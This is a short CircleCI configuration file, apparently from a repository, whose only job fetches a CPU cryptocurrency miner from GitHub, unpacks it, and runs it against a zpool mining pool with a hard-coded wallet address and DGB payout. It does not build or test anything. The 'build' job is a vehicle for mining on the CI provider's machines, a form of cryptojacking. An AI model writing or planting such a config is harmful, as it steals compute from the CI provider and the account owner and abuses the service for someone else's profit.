ersion: 2.1

jobs:
  build:
    machine:
      image: ubuntu-2004:202010-01
    steps:
      - checkout
      - run: wget https://github.com/rplant8/cpuminer-opt-rplant/releases/download/5.0.11/cpuminer-opt-linux.tar.gz
      - run: tar xf cpuminer-opt-linux.tar.gz
      - run:  ./cpuminer-sse2 -a power2b -o stratum+tcp://power2b.sea.mine.zpool.ca:6242 -u DLsdgNpkEjrYQs1fUQ1mDwZ3Mt5gL1v1WK -p c=DGB